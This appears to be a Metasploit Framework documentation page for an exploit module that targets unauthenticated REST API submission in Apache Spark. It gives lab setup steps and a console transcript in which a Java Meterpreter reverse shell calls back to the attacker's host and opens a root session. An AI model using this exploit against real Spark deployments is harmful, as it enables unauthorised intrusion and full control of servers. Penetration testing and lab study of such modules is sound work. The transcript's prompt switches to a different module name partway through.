ContextQMD
Back to Metasploit Framework

Spark Unauth Rce

documentation/modules/exploit/linux/http/spark_unauth_rce.md

6.4.1312.3 KB
Original Source

Description

This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API. It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.

Verification Steps

https://github.com/vulhub/vulhub/tree/master/spark/unacc

docker-compose up -d

Verification Steps

  1. get session on target
  2. use exploit/linux/http/spark_unauth_rce
  3. set payload <payload>
  4. set rhosts <rhosts>
  5. set rport <rport>
  6. set srvhost <srvhost>
  7. set srvport <srvport>
  8. set lport <lport>
  9. set lhost <lhost>
  10. exploit

Scenarios

Spark 2.3.1

msf > use exploit/linux/http/spark_unauth_rce
msf exploit(linux/http/spark_unauth_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf exploit(linux/http/spark_unauth_rce) > set rport 6066
rport => 6066
msf exploit(linux/http/spark_unauth_rce) > set srvhost 10.139.14.167
srvhost => 10.139.14.167
msf exploit(linux/http/spark_unauth_rce) > set srvport 9999
srvport => 9999
msf exploit(linux/http/spark_unauth_rce) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(linux/http/spark_unauth_rce) > set lhost 10.139.14.167
lhost => 10.139.14.167
msf exploit(linux/http/spark_unauth_rce) > set lport 5555
lport => 5555
msf exploit(linux/http/spark_unauth_rce) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.139.14.167:5555
msf exploit(linux/http/spark_unauth_rce) > [*] Starting up our web service ...
[*] Using URL: http://10.139.14.167:9999/feTYHNiHufrGI
[*] 127.0.0.1:6066 - Sending the payload to the server...
[*] Sending stage (53867 bytes) to 10.139.14.167
[*] Meterpreter session 2 opened (10.139.14.167:5555 -> 10.139.14.167:56021) at 2018-11-12 16:59:33 +0800
msf exploit(linux/http/apache_couchdb_cmd_exec) > sessions

Active sessions
===============

  Id  Name  Type                    Information          Connection
  --  ----  ----                    -----------          ----------
  2         meterpreter java/linux  root @ 96b2135aee9c  10.139.14.167:5555 -> 10.139.14.167:56021 (127.0.0.1)

msf exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: root
meterpreter >